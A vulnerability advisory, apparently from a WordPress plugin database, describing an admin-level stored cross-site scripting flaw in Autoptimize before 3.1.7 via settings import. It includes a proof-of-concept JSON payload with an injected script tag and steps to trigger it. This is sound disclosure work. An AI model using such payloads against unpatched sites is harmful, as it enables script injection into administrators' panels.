WordPress Plugin Vulnerabilities
Autoptimize < 3.1.7 - Admin+ Stored Cross-Site Scripting via Settings Import
Description
The plugin does not sanitise and escape the settings imported from a previous export, allowing high privileged users (such as an administrator) to inject arbitrary javascript into the admin panel, even when the unfiltered_html capability is disabled, such as in a multisite setup.
Proof of Concept
To reproduce this vulnerability be sure to follow the steps below:
1. Generate a JSON file with the following content:
{"ccss":{"rules":"{\"paths\":{\"foo\":{\"hash\":0,\"file\":\"<script>alert(`Stoooored XSS`)</script>\"}}}"}}
Make sure to save this file with the name: "settings.json" (required).
2. Compress this "settings.json" file into a zip file with any name. The application backend only expects to receive this type of extension (zip).
3. In the web application (in the "Critical CSS" section) once you have selected your zip file to upload, click on the "Import Settings" button.
The payload should be triggered immediately upon upload. Affects Plugins
Fixed in version 3.1.7
References
Classification
Miscellaneous
Original Researcher
Juampa Rodríguez
Submitter
Juampa Rodríguez
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2023-05-02 (about 26 days ago)
Added
2023-05-02 (about 26 days ago)
Last Updated
2023-05-02 (about 26 days ago)